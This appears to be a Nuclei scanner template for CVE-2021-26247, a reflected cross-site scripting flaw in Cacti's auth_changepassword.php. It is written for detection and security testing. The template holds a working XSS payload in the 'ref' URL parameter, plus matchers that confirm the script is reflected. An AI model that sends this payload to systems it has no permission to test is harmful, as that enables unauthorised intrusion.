38 lines
1.1 KiB
YAML
38 lines
1.1 KiB
YAML
id: CVE-2021-26247
|
|
|
|
info:
|
|
name: Unauthenticated XSS Cacti - auth_changepassword.php
|
|
author: dhiyaneshDK
|
|
severity: medium
|
|
description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26247
|
|
- https://www.cacti.net/info/changelog
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-26247
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2021,cacti,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"></script><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|